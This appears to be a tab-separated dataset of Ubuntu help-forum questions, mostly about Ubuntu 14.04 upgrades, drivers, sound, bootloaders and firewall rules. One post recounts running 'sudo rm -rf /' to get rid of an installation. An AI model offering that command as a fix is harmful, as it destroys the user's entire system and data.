455740	xubuntu 14.04 system sound not working ?	there are no system sounds as far as i can tell and there is no option for setting this in settings . speakers are working fine as i 'm able to play youtube videos . its a fresh 14.04 lts install . all help is appreciated . edit : i 'm sorry for not putting things in better words . yes , youtube sounds and songs , movies etc are working fine . its just sound indication/system sounds which were played as a feedback from system during events . e.x : login sound . 2nd edit : i was able to get log-in sound working by following this http : //ubuntuforums.org/showthread.php ? t=1869787 & page=2 however , nothing else has worked to get other sounds working which are mentioned in there . 3rd edit : problem ; xxxxx : ~ $ xfconf-query -c xsettings -p /net/enableeventsounds false xxxxx : ~ $ xfconf-query -c xsettings -p /net/enableinputfeedbacksounds false found solution , looks like this was set to false so i had to change it to true using following commands , not sure why it was on false though .- . xfconf-query -c xsettings -p /net/enableeventsounds -s true xfconf-query -c xsettings -p /net/enableinputfeedbacksounds -s true thanks for all your help ^^
455741	upgrade from 13.04 to 14.04	i have kubuntu 13.04 ( unsupported release ) , and want to upgrade it to 14.04 . when i 'm trying to run do-release-upgrade i got this error : traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 123 , in `` % ( url ) s\n '' ) % { 'url ' : url } ) valueerror : unsupported format character ' ? ' ( 0xa ) at index 55 i know that i should upgrade to 13.10 first . i read the documentation , but when i tried to add old-releases repository to my sources list , something like deb http : //old-releases.ubuntu.com/ubuntu/ raring main restricted universe multiverse i get 404 error while updating my sources . is this documentation too old to help me ? where can i find newer docs ? or can you show me other way to upgrade my os ?
455744	how to delete windows and make ubuntu use whole space , without reinstall ?	i have both ubuntu and windows installed . my partition setup is pretty simple : after latest updates to kerbal space program , ubuntu and steam , last reason to keep windows installed perished . how can i get rid of windows partitions and give all that space to ubuntu , without breaking my bootloader ? i 'm pretty sure that simply deleting partition with boot flag would n't be the wisest course of action . note that there are 2 similar questions and i have seen them : how to get rid of windows getting rid of windows sadly , both are about fresh ubuntu installations , and neither is about ubuntu already installed on physical partition .
455745	when installing/ downloading something , ubuntu ( 14.04lts ) locks by itself	i have a question regarding the auto-lock of ubuntu . when i 'm downloading something , for instance : yesterday i downloaded oracle jdk8 using the terminal cause i had to add a ppa . now my download was at approx . 64 % and ubuntu locked by itself . i really like that though , but does it then affects my download or installation ? is the jdk now correctly installed , or interrupted ? i 'd really like an answer from an user that 's for 100 % sure , if not , do n't answer . thanks !
455747	how can i make all applications use nemo 's file selection dialog instead of nautilus ?	i switched to nemo a long time ago , because i think it 's superior to nautilus in many ways . one small thing bothers me however : whenever i want to open a document in gedit ( or evince , but i 'm sure there are other programs as well ) not the nemo file-selection window appears but the nautilus one . i did of course replace nemo with nautilus as suggested in a lot of other posts : gsettings set org.gnome.desktop.background show-desktop-icons false and xdg-mime default nemo.desktop inode/directory application/x-gnome-saved-search and also did ln -s /usr/bin/nemo /usr/local/bin/nautilus in order to completely replace nautilus , but this does n't help . which program/executable is triggered when hitting open ( ctrl+o ) in gedit/evince ?
455748	network manager asks to unlock keyring after auto login	after updating from precise to trusty i get a popup requesting to unlock the keyring for network manager after each login ( autologin is enabled ) . on the net people advise to make the connection available for all users or install libpam-gnome-keyring . i did both and none helped to solve the problem . i know of the method to unlock the keyring by setting a blank password but this seems to be a bad solution in terms of security . i only want to connect to wifi without password check , not to unlock the keyring for everybody . : )
455752	installing software for older versions of ubuntu ?	i just upgraded from ubuntu 12.04 to 14.04 ( 64 bit ) , and i wanted to install skype . but skype does not have a download for version 14.04. http : //www.skype.com/en/download-skype/skype-for-computer/ can i install the 12.04 version ? in general , what happens when you install software for older versions on newer versions ? this is question is not a duplicate , it is totally different !
455754	remote desktop does n't works after upgrade from 13.10 to 14.04	i worked for many years with ubuntu nas server . now last week i updated my server from 13:10 to 14:04 . that in itself went well except remote desktop . the server is in the attic and i control it from my work pc thru vnc . after the update , this no longer works and vnc gives the following message : no supported authentication methods ! i have vnc server installed as a separate application , but i also get the same error message . when i look at my settings , everything is still the same . does anyone know how i can `` fix '' it without reinstall ubuntu ? thanks for the help . grt jaydee
455756	no graphical login after purging cinnamon	i wanted to try cinnamon and installed it : sudo apt-get install cinnamon but it did n't work well , because all the gnome stuff was missing on my kubuntu . so i purged cinnamon and rebooted . now i ca n't login on tty7 ( graphical interface ) any more . i was stuck in a login loop ... i tried chowning and deleting .xauthority , but with no effect . how can i fix my graphical login ? it 's really annoying to login on tty1 and then startx ...
455762	xbindkeys wo n't work properly	i have bit of a problem . i wanted to remap some hotkeys i am used to from my previous system but i ca n't get it to work properly with xbindkeys . xbindkeys recognizes the combination but somehow the command does not trigger . if i use the command xdotool key braceleft it outputs me the correct { sign in the console . however if i use the same command in xbindkeys nothing happens . if i replace the command with firefox it works properly and opens firefox , so i guess xbindkeys works . i want to achieve the following : i want to type the character { to the active window with either alt_r + 7 or alt_left+ctrl+7 so i can use both . i know alt_r ( altgr ) is the proper way but on german keyboards it is somehow hard to type the braceleft with the altgr ( alt_r ) key so i have to use alt_l+control+7 instead ( like i was used to in my previous system ) . i somehow got it to work properly in 12.04 , but i ca n't get it to work in 14.04 . any suggestions ? i tried several commands . all of them worked in the console but none of them worked when executed by xbindkeys xdotool type ' { ' xdotool key braceleft xdotool key iso_level3_shift+7 xvkbd -xsendevent -text ' { ' xvkbd -xsendevent -text '\ [ alt_r ] +7' this is my config , which wo n't work '' xdotool key braceleft '' control+alt + 7 however , this works : '' firefox '' control+alt + 7 solution edit as i tried another several things , i noticed that xdotool seems to trigger too soon . i altered the config like this : '' sleep 1 & & xdotool type -- delay 15 ' { ' '' control+alt + 7 now it sends the correct { sign to the active window . now the only thing left is to reduce the sleep and delay to a workable value , because 1 second seems a bit too long : ) ** addition info ** well , now i managed to find suitable values . however this only works if you release the keys until the sleep duration is over . if you are too slow if wo n't work . this is my current config for all unconvenient german altgr characters '' sleep 0.2 & & xdotool type -- delay 15 ' { ' '' control+alt + 7 '' sleep 0.2 & & xdotool key -- delay 15 at '' control+alt + q '' sleep 0.2 & & xdotool type -- delay 15 'âź ' '' control+alt + e '' sleep 0.2 & & xdotool type -- delay 15 ' [ ' '' control+alt + 8 '' sleep 0.2 & & xdotool type -- delay 15 ' ] ' '' control+alt + 9 '' sleep 0.2 & & xdotool type -- delay 15 ' } ' '' control+alt + 0 '' sleep 0.2 & & xdotool type -- delay 15 '~ ' '' control+alt + plus however if you want to type multiple @ signs ( for example ) you have to press ctrl+alt+q as intended , but release all keys and then press it again . this , however is much , much better than not having the option control+alt instead of altgr but it is not that effective as i was used too . maybe i will find a solution for this too .
455764	installing 14.04 ( 64bit ) and restoring certain config files from 12.04 ( 32bit )	i currently have a 12.04 lts ( 32bit ) installed alongside windows . i 've also set-up virtualbox inside my current ubuntu installation . well , i know that a simple sudo update-manager -d will get me through to the latest lts release but not onto a different architecture . having said that ; i 'm planning on a fresh install of 14.04 ( 64bit ) to avoid further issues as i do not have spare time look through . since its completely a different architecture ; what i 'm concerned is about certain settings and applications whether those will fit into the new one . one of my main objectives is to keep virtualbox settings as i 've done few tweaks and mounted/shared drives into the guest vm ( s ) . i 've used deja-dup to backup my home folder but it has so many unnecessary configs such as wine which i do n't even need it . what i would like to know is that , apart from the below shown image ( .config & virtualbox vms ) what else do i need to back up.. ( note : necessary files from home folder are copied mostly , but still any advice will be appreciated ) .
455766	primary display unknown	i 'm new to ubuntu , i recently installed 12.04.4 lts . my display is not recognized by ubuntu . display : kent modular electronics ( kme ) 29lr1901a51un/1 connected via rgbhv bnc connectors . video card : nvidia geforce 7600 gt under windows i 'm using 1280x1024 . i tried different drivers using 'additional drivers ( jockey-kde / jockey-gtk ) , right now using nvidia_304.116 via jockey-gtk : 'this driver is activated but not currently in use . ' trying different drivers does n't yield different resolutions , and in displays my screen does n't get recognized . display unknown . via https : //wiki.ubuntu.com/x/config/resolution i tried 'adding undetected resolutions ' . $ cvt 1280 1024 # 1280x1024 59.89 hz ( cvt 1.31m4 ) hsync : 63.67 khz ; pclk : 109.00 mhz modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync after which $ xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync this will add the mode to the list , but as tv-0 disconnected . i 'm not able to use the mode . screen 0 : minimum 8 x 8 , current 1024 x 768 , maximum 4096 x 4096 vga-0 connected primary 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 1360x768 60.0 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 576x432 60.1 512x384 60.0 400x300 72.2 60.3 56.3 320x240 60.1 tv-0 disconnected ( normal left inverted right x axis y axis ) 1280x1024_60.00 ( 0x26c ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz from here i do n't know what i 'm supposed to do . having done this doens't change anything yet . after rebooting this tv-0 mode is lost . trying to add the mode : $ xrandr -- addmode tv-0 1280x1024_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 25 current serial number in output stream : 26 is this wrong ? installed inxi : inxi -g graphics : card : nvidia nv44 [ geforce 6200 le ] x.org : 1.14.5 drivers : nvidia ( unloaded : fbdev , vesa , nouveau ) resolution : 1024x768 @ 60.0hz glx renderer : geforce 6200 le/pcie/sse2 glx version : 2.1.2 nvidia 304.116
455768	set apt-get to use gzip bz2 , gzip or uncompressed file ?	the ubuntu repositories dists folder contains both packages , packages.gz and packages.bz2 files . out of these , apt-get uses one of them during an update . where can i configure apt to choose a particular compression type file instead of others . i am in a university using an internal mirror and for some reason one of the files is giving a hash mismatch error . i think if i use bz2 instead of gzip , perhaps i can get past the erroneous file . my apt-get update always tries to fetch .gz files and fails on one of them .
455769	ubuntu gnome 14.04	in my ubuntu gnome was 3.9.90 , i added gnome 3.12 ppa via : sudo add-apt-repository ppa : gnome3-team/gnome3-staging now i do dist-upgrade and lost ctrl+alt+t shortcut for terminal
455780	i have newly installed 14.04 and sound is going to fails after a while in speaker but in headphone sound working fine ?	i have newly installed 14.04 and sound is going to fails after a while in speaker but in headphone sound working fine . i have unmuted all in alsmixer but still no voice is coming through speakers .
455782	ubuntu 14.04 wo n't boot after installation	here 's the story , i have windows 7 on my pc and i just installed ubuntu 14.04 , here 's how i 've done it : went in windows and made some unallocated space in order to install ubuntu there . installed ubuntu there using the something else method ( i have made a ext4 partition for ubuntu and a swap partition ) . everythings done i restart . problem is , now that i have installed it i ca n't access it.when my pc boots up it directly boots in windows and also in it 's boot options there is none that could boot me into ubuntu . i 've seen some solutions using boot-repair and such but they do n't seem to work anymore in 14.04 . so how can i make it to dual-boot both windows and ubuntu ? update due to the fact that i have installed ubuntu from an usb i tried the following lines : sudo grub-install /dev/sdx sudo update-grub i used sd4 ( the place where i installed ubuntu ) instead of sdx.sadly after the first line it gave me the follwing error : `` failed to get the canonical path of '/cow ' `` i have tried the possible duplicate solution and here 's what i get . ubuntu @ ubuntu : ~ $ sudo mount /dev/sd4 /mnt mount : special device /dev/sd4 does not exist ubuntu @ ubuntu : ~ $ sudo mount /dev/sda4 /mnt ubuntu @ ubuntu : ~ $ sudo mount /dev/sda4 /mnt/boot ubuntu @ ubuntu : ~ $ sudo grub-install -- root-directory=/mnt /dev/sda4 installing for i386-pc platform . grub-install : warning : file system `ext2 ' does n't support embedding . grub-install : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. grub-install : error : will not proceed with blocklists . ubuntu @ ubuntu : ~ $ sudo grub-install -- root-directory=/mnt /dev/sda4 installing for i386-pc platform . grub-install : warning : file system `ext2 ' does n't support embedding . grub-install : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. grub-install : error : will not proceed with blocklists . ubuntu @ ubuntu : ~ $ sudo grub-install /dev/sda4 installing for i386-pc platform . grub-install : error : failed to get canonical path of `/cow ' . ubuntu @ ubuntu : ~ $ sda4 is a ext4 partition however so i do n't understand why it sais ext2 .
455783	compressing videos create even larger file	i have been using the gui ( right click = > compress ) to try and compress a .tar containing 3 videos totalling 1.7gb ( .h264 mp4s ) . gzip , lrzip , 7z etc . all do nothing to the file size and the compressed folder is also 1.7 gb . i then tried running lrzip from the command line ( in case it was a gui problem ) , and used the -z flag ( extreme compression ) , and this was my output . as the compression ratio shows , the actual size of the compressed folder is bigger than the original ! i do n't know why i am having no luck , lrzip in particular should be effective according to random reviews i have read and the official docs ( files larger than 100mb , the larger the better ) - see https : //wiki.archlinux.org/index.php/lrzip why ca n't i compress my files ?
455785	i changed my password to `` none '' and now i don`t have authorities to change it back ( ubuntu 14.04 )	today i have decided to `` upgrade '' my ubuntu from the 13.10 to 14.04 and on the way to make my life `` easier '' by stop using passwords since i am the only computer user in the hose , but now every time i want to install a program it ask me for authentication password although i have noun i try to just leave the filed empty and press `` enter '' and i tried to use my old pass but it didnt work , i cant even go to system setting and put a new password : ( any one have an idea what i can do now ? p.s this computer and username are used only for `` linux learning '' so i don`t mind giving my old password or even grant you remote access if needed , i have nothing impotent in here : ) and i think this link is relevant : i have no password but ubuntu thinks i still do im trying to change it but i cant
455787	simplest mta mail setup for a desktop to receive ( ana ) cron emails	ubuntu ( 12.04 lts ) does n't seem to install any sort of mailer by default . everybody seems to recommend installing postfix . i am familiar with postfix , which i use on several `` real '' servers . but it feels wrong to install a heavy-duty fully featured mail server on a desktop , just so that ( ana ) cron emails have somewhere to go . there must be a more light-weight solution for such a trivial local-only task . which is the simplest mailer to install on my notebook , just so that system emails like cron errors are saved somewhere ( just written to /var/mail/username would be sufficient ) .
455788	how to install pixel saver on gnome 3.10	how to install pixel saver gnome extension on gnome 3.10
455793	wwan chip vodafone	i am using on my compaq mini laptop both windows xp and ubunbtu 14.04.while connection via wlan works fine in either installation , my vodafone wwan mobile connect chip seemingly works only on windows xp . can anybody help for ubuntu ? rolf
455794	i ca n't find metacity folder in my os 14.04lts	i ca n't find metacity folder in my os 14.04lts /apps/metacity/general/button_layout metacity please help me
455798	can not `` apply changes '' in software & updates > additional drivers	ran current ubuntu off usb , needed to enable `` broadcom 802.11 linux sta wireless driver ... '' by clicking apply changes in additional drivers . having done that was able to connect to wifi without problem . whilst connected , i `` installed '' ubuntu on my hp mini 110 , cleaning everything off the drive . updates were downloaded and everything was peachy . prompted to reboot , i did so and encountered again the need to apply changes to get the wireless working . but now , clicking on apply changes does nothing but reset the button to `` do not use this device '' . i can not enable the broadcom driver and , of course , can not connect to wifi . in summary : works fine when booted from usb ; does n't work when booted from installed ubuntu . thx .
455800	where is the `` default wallpaper '' wallpaper stored	i just upgraded to 14.04 , and it 's amazing . obviously , i went to check out the new backgrounds and one caught my eye . it 's an abstract blue design and is marked as one that changes throughout the day and its title is `` default wallpaper '' . i really would like to find this wallpaper 's file , but i ca n't . if you are wondering , it looks like this : i 've checked in /usr/share/backgrounds and /usr/share/wallpapers but neither has them , just the picture wallpaper . is there a special place that the ones that change are stored , or are they simply inaccessible ?
455802	starting/stopping upstart service when digitalocean droplet is created ( 14.04 )	i 'm running a node.js server on a digitalocean droplet , and i want the server to announce that it 's ready to an external service ( via http post ) . the server runs via an upstart script using the `` startup '' event . the node.js server itself creates the post to the external service when it successfully starts . but when i create the droplet , it restores the machine to the original state ( the node.js server is already up and running ) . so since the node.js server does n't start , the post to the external service never happens . is there an alternative upstart event i can use that 's not `` startup '' ? one that would fire when a vm somes online ? i 'm new to upstart , so i 'm still trying to get my bearings with this tool , any help would be greatly appreciated .
455804	colors are in a mess in ubuntu	when booting ubuntu live cd screen colors are all messed up , so any text is hardly readable . happens with fedora , *ubuntu , mint and others but not debian . acer z5710 nvidia g210m last ubuntu i can use is precise .
455805	something is not quite right with these iptables ' rules ?	i found this after googling : iptables -a input -i lo -j accept iptables -a output -o lo -j accept # allow loopback access iptables -a output -d 255.255.255.255 -j accept # make sure you can communicate with any dhcp server iptables -a input -s 255.255.255.255 -j accept # make sure you can communicate with any dhcp server iptables -a input -s 192.168.0.0/16 -d 192.168.0.0/16 -j accept # make sure that you can communicate within your own network iptables -a output -s 192.168.0.0/16 -d 192.168.0.0/16 -j accept iptables -a forward -i eth+ -o tun+ -j accept iptables -a forward -i tun+ -o eth+ -j accept # make sure that eth+ and tun+ can communicate iptables -t nat -a postrouting -o tun+ -j masquerade # in the postrouting chain of the nat table , map the tun+ interface outgoing packet ip address , cease examining rules and let the header be modified , so that we do n't have to worry about ports or any other issue - please check this rule with care if you have already a nat table in your chain iptables -a output -o eth+ ! -d a.b.c.d -j drop # if destination for outgoing packet on eth+ is not a.b.c.d , drop the packet , so that nothing leaks if vpn disconnects edited : i add the following to make it easier for forum members to contribute their ideas here 's what i did : a . as i am using ubuntu 12.04 lts , i installed iptables-persistent . b. i issued the command sudo gedit /etc/iptables/rules.v4 and replace the default in it with the following : *filter -a input -i lo -j accept -a output -o lo -j accept # allow loopback access -a output -d 255.255.255.255 -j accept # make sure you can communicate with any dhcp server -a input -s 255.255.255.255 -j accept # make sure you can communicate with any dhcp server -a input -s 192.168.0.0/16 -d 192.168.0.0/16 -j accept # make sure that you can communicate within your own network -a output -s 192.168.0.0/16 -d 192.168.0.0/16 -j accept -a forward -i eth+ -o tun+ -j accept -a forward -i tun+ -o eth+ -j accept # make sure that eth+ and tun+ can communicate -t nat -a postrouting -o tun+ -j masquerade # in the postrouting chain of the nat table , map the tun+ interface outgoing packet ip address , cease examining rules and let the header be modified , so that we do n't have to worry about ports or any other issue - please check this rule with care if you have already a nat table in your chain -a output -o eth+ ! -d 111.222.333.444 -j drop # if destination for outgoing packet on eth+ is not a.b.c.d , drop the packet , so that nothing leaks if vpn disconnects commit c. i save the changes to /etc/iptables/rules.v4 and reboot the computer . note that 111.222.333.444 is an example of an ip address of the vpn server located in xyz country d. upon reboot , i am unable to connect to the vpn server . something is wrong with the contents of rules.v4 any help is welcome
455806	ffmpeg since update to 14.04	ever since i updated to 14.04 ( from 13.10 ) , each time i launch the software updater , it shows on the list of updates `` ffmpeg derived postprocessing library '' . yet , it also says on the same window about the ffmpeg update : 'the update has already been downloaded ' ! ! ? . when i then click on install now , it says about the ffmpeg update : 'package operation failed . the installation or removal of a software package failed . ' i ca n't say i 've a clue what to do with this update . how do i stop it being listed on the list of updates each time i fire the software updater ? more importantly , do i need to have that update ? have to say , the computer as such seems to be working all right . ca n't say i 've noticed anything ... so far any way : ) would be grateful for any answers to any of the qs above . thanks
455812	motion webserver not working	so , i 've installed motion on ubuntu 12.10 , and it seems to be working , for the most part . the /tmp/motion directory is filling with images ... so far , so good ... however , the built in webserver is n't working as i 'd expect . if i visit localhost or the ip of the machine , i just get a holding page . the webserver is apparently working on port 8081 ( the default ) but just serving a white page saying there 's no content as yet . here 's my motion.conf : http : //hastebin.com/lotiniwavo.vala
455815	matlab 2013a installation error on ubuntu 14.04 lts	after 83 percent installation it gives error the following error was detected while installing sl3d_glnxa64 : archive is not a zip archive would you like to retry installing sl3d_glnxa64 ? if you press no , the installer will exit without completing the installation .
455816	remote login on ubuntu 14.04	on ubuntu 13.10 in login screen there was an option for remote login.where is this option in ubuntu 14.04 ? how can i enable it ?
455820	no hibernate button in ubuntu 14.04	i had this problem in 13.10 . similarly , after i upgraded to 14.04 the same problem has occurred . how do i get hibernate button back as i had in 13.04 ?
455821	no desktop or functions after login	after restarting after the ubuntu os installation , the login screen came up and everything looked normal with the toolbar ( functioning correctly ) at the top . but when i logged into to my account or as guest , i lost the toolbar and the icons . i have tried every suggestion i could find on how to reset , reinstall , restart unity . i am starting to believe the problem is my display drivers . when trying to restart unity the first line usually says it can not find my display or some sort of fault for the display . the system i am working with is a toshiba techra m7 with an internal nvidia quadro nvs 110m 128 mb video card . how do i check my video drivers or install what i need from a terminal screen ?
455823	lsb shows different version than control center	command line shows ubuntu version as 14.04 while gui shows 13.10 . i was upgrading my system yesterday from 12.04 to 14.04 . when around 60-65 % updates were installed , i had to shut down the system . when i restarted the system in the morning , the system booted fine but now it shows the above problem as shown and . i tried the standard methods listed here and here . this is output of sudo apt-get update . it clearly shows that updates are being made from 'trusty ' . i tried to upgrade to 14.04 ( assuming i was on 13.10 ) using sudo update-manager -d but i got message saying `` software is up to date '' . can someone explain me how do i fix it . also how come system recovered from the failed update ? also the system now takes a lot of time to boot and it has one other minor issue . when i login in into the system , i get a glitch as shown in this video . this is just after i enter the password . is it related to the issue i mentioned above or is it something else ?
455824	using applets from another distribution	there are several very useful applets from mint cinnamon which i would like to be able to use : http : //cinnamon-spices.linuxmint.com/applets . i know how to write a shell script to start a java program , for example : java -xms512m -xmx2048m -dorg.xxxxx.scriptrun=true -cp xxxxx.jar : lib org.xxxxx.xxxxx but i think these applets are written in javascript , is it possible to write a similar command for this type of program ? when i have created the shell script , i could create a .desktop file to run it , would it then be possible to put it on the launcher ?
455826	ubuntu 14.04 lags when opening certain applications	i recently upgraded from 13.10 to 14.04 . i uninstalled first amd drivers ( from amd site ) before upgrading . when i installed the driver after the upgrade , opening chromium or any integrated webapp and unity 8 applications will cause the whole system to lag significantly that i have to repeatedly click the close button just to close it and stop the lag . firefox does not have this problem nor any of the other apps . right now , i only use the open source drivers since the issue does not happen with it but i need the proprietary drivers so i can play steam games : ( any help ? thanks ! : )
455829	redefine shortcuts for keys being set to default after reboot	i am using phpstorm editor on ubuntu 14.04 . everything is so smooth that i am loving the experience ( especially the workspace experience is amazing ) however this bug is giving me headache ... some of the editor 's short-cuts clash with default ubuntu keys ( alt + ctrl + left , right , up or down arrow keys ) . i have changed the default keys to ( super + left , right , up and down arrow keys ) so they do n't collide with my editor but after the reboot , ubuntu changes are somehow reverting to default . this keeps comming again and again . i am sure there is a way out so therefore need help with that ...
455830	the volume âbootâ has only 0 byte disk space remaining ?	i am in ubuntu 12.04 . when i install the software updates with `` update manager '' , there is a pop up dialog which tells me `` the volume `` boot '' has only 0 byte disk space remaining '' my current kernal in use is : myname : ~ $ uname -r 3.11.0-19-generic the content of boot folder is : laptop1 : ~ $ ls -lah /boot total 215m drwxr-xr-x 4 root root 2,0k abr 26 14:49 . drwxr-xr-x 23 root root 4,0k abr 26 14:48 .. -rw-r -- r -- 1 root root 983k oct 23 2013 abi-3.11.0-13-generic -rw-r -- r -- 1 root root 983k nov 12 18:33 abi-3.11.0-14-generic -rw-r -- r -- 1 root root 983k ene 30 18:53 abi-3.11.0-15-generic -rw-r -- r -- 1 root root 984k feb 3 23:20 abi-3.11.0-17-generic -rw-r -- r -- 1 root root 985k mar 11 20:06 abi-3.11.0-19-generic -rw-r -- r -- 1 root root 985k abr 1 23:08 abi-3.11.0-20-generic -rw-r -- r -- 1 root root 160k oct 23 2013 config-3.11.0-13-generic -rw-r -- r -- 1 root root 160k nov 12 18:33 config-3.11.0-14-generic -rw-r -- r -- 1 root root 160k ene 30 18:53 config-3.11.0-15-generic -rw-r -- r -- 1 root root 160k feb 3 23:20 config-3.11.0-17-generic -rw-r -- r -- 1 root root 160k mar 11 20:06 config-3.11.0-19-generic -rw-r -- r -- 1 root root 160k abr 1 23:08 config-3.11.0-20-generic drwxr-xr-x 5 root root 1,0k abr 26 14:48 grub -rw-r -- r -- 1 root root 26m nov 23 17:56 initrd.img-3.11.0-13-generic -rw-r -- r -- 1 root root 26m dic 24 14:55 initrd.img-3.11.0-14-generic -rw-r -- r -- 1 root root 26m feb 1 20:46 initrd.img-3.11.0-15-generic -rw-r -- r -- 1 root root 26m feb 22 14:00 initrd.img-3.11.0-17-generic -rw-r -- r -- 1 root root 26m abr 22 20:57 initrd.img-3.11.0-19-generic -rw-r -- r -- 1 root root 26m abr 26 14:48 initrd.img-3.11.0-20-generic drwx -- -- -- 2 root root 12k oct 30 21:03 lost+found -rw-r -- r -- 1 root root 173k jun 17 2013 memtest86+.bin -rw-r -- r -- 1 root root 175k jun 17 2013 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 3,2m oct 23 2013 system.map-3.11.0-13-generic -rw -- -- -- - 1 root root 3,2m nov 12 18:33 system.map-3.11.0-14-generic -rw -- -- -- - 1 root root 3,2m ene 30 18:53 system.map-3.11.0-15-generic -rw -- -- -- - 1 root root 3,2m feb 3 23:20 system.map-3.11.0-17-generic -rw -- -- -- - 1 root root 3,2m mar 11 20:06 system.map-3.11.0-19-generic -rw -- -- -- - 1 root root 3,2m abr 1 23:08 system.map-3.11.0-20-generic -rw -- -- -- - 1 root root 5,4m oct 23 2013 vmlinuz-3.11.0-13-generic -rw -- -- -- - 1 root root 5,4m nov 12 18:33 vmlinuz-3.11.0-14-generic -rw -- -- -- - 1 root root 5,4m ene 30 18:53 vmlinuz-3.11.0-15-generic -rw -- -- -- - 1 root root 5,4m feb 3 23:20 vmlinuz-3.11.0-17-generic -rw -- -- -- - 1 root root 5,4m mar 11 20:06 vmlinuz-3.11.0-19-generic -rw -- -- -- - 1 root root 5,4m abr 1 23:08 vmlinuz-3.11.0-20-generic questions : among those files in boot folder , which can be removed ? thank you : )
455831	unable to access bios	i switched to ubuntu a while back and over time entropy and inexperience lead to a bunch of redundant applications , a very messy directory tree and general slowness . i figured rather than upgrade to 14.04 i would do a clean install . i created a bootable usb and attempted to reach the bios so as to change the boot order . i 've tried pressing , clicking repeatedly and holding esc , shift , super , alt , fn , ctrl , f1-f12 , pause , vaio and delete , but none worked . i figured i 'd manually disable starting up in ubuntu with sudo rm -rf / . i just ended up booting in grub . i took the hard drive out , when booting up it now says : operating system not found do i not have a bios or something ? what the heck is going on ?
455832	help with my ubuntu updates and flash player 11.3.300 download	i have been trying to download flash player 11.3.300 but i can not seem to do so . every time i try to click into the software center it just shuts straight down . i then tried to update my dell studio laptop but it comes up with this : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_quantal-security_restricted_i18n_translation-en % % 5fgb , e : the package lists or status file could not be parsed or opened .
455834	how to connect to wifi using broadcom netxtreme bcm05751m gigabit ?	i 've got an old laptop and installed ubuntu 14.04 on it . when i go to the wifi set up and choose my wifi and put in the password it starts trying to connect to it but it wo n't . it shows a message saying that i 'm offline or the password gets asked again . i 'm 100 % sure that the password i put in is correct . so i installed the lubuntu desktop and it does n't work too . $ lspci -vvnn | grep 14e4 10:00.0 eternet controller [ 0200 ] : broadcom corporation netxtreme bcm05751m gigabit ethernet pci express [ 14e4:167d ] ( rev 11 )
455839	will the bamboo pad ( not tablet ) work on ubuntu 14.04 ?	will the wacom bamboo pad work on my ubuntu mac ?
455841	any way to `` export '' lubuntu ?	is there any way to 'copy ' or 'export ' lubuntu to a usb-drive so i can use it on another pc without having to set it up ?
455842	how can i choose soundfont in qsynth ?	i 'm using a midi keyboard with qjackctl and qsynth . i installed some soundfonts , but now how can i choose the sound i want to play ? if piano , or guitar , or organ or synth etc.. thanks
455844	how can i install ftp server in kubuntu ?	how install ftp server in kubuntu ? please step by step , i installed by the comand sudo apt-get install vsftpd , but i cant connecting using filezilla
455848	simplescreenrecorder ca n't record both system and audio	i have installed simplescreenrecorder but i ca n't get both mic or system to work there is sound coming but always from 1 source i wish it was 2 sources there are other threads but they are outdated i tried jack alsa pulseaudio and all options from source i do n't want a workaround i see some programs can record both audio and system .
455849	unity greeter does not display custom wallpaper	i am using ubuntu 14.04 lts 64 bit . i know this question has popped up many times but i want to make it very clear that none of the posts helped me a bit . my problem : i am unable to get my custom wallpaper stored at /home/sudeepto/pictures on the ubuntu login screen . the screen shows me purple background and upon giving login credentials the graphics gets really scrambled for a while and then i can use my system just fine . i guess since most of the articles are not ubuntu 14.04 based , i am having such problems . things that i tried : i followed this post on askbuntu . i tried both the suggestions but no luck . i do n't know how to take screenshot of unity-greeter , otherwise i would have given links to my login screen as well . please tell me what should i do next to solve this problem which i never faced in previous versions of ubuntu .
455851	update drivers on xps 8700	actually i migrate and install to ubuntu 14.04 and i will to know what is the best way tu update my drivers ? my machine is a xps 8700 graphics card amd radeon ... . and i have another question , why after to install ubuntu on this machine i hear a sound on the pc like a ventilator it 's running very hard , by the way this ventilator works fine , thanks for you help ... . best regards
455852	3d setttings on ubuntu 14.04lts	alas ! i can not operate any 3d application on linux ubuntu 14.04 lts i have tried many applications on my ubuntu 14.04 lts but they are not supported check this out this one https : //chrome.google.com/webstore/detail/biodigital-human/agoenciogemlojlhccbcpcfflicgnaak ? utm_source=chrome-ntp-icon it is just nonfunctional for ubuntu , does ubuntu really do not support 3d or any 3d drivers are missing in my pc currently i am using integrated motherboard graphica of radeon 3000 graphics and procesor of amd athlon 2 if there is something missing in my system then please inform i am very new to ubuntu and i require a serious help from others please hep me
455856	new icons for ubuntu 14.04	i would like to know when new icons will available for ubuntu 14.04 lts . does anyone know about new icons ?
455859	is there an option to `` force '' hud to open file after i click on it instead of going to options ?	when i lunch application from hud i just need to type few letters and than when i see application that i want to run i just click on it and it opens . problem is with files that are the results of the search in hud . when i see it on the list i need to click on it and than it will go down one level and give few options ( open , show in folder and email ) and then i can open it . is there an option where i could skip this one level so this file would act as an application ( eg left click - > open , right click - > go to options ) ? i hope i explained it good . thanks in advance for any directions how to do it . t .
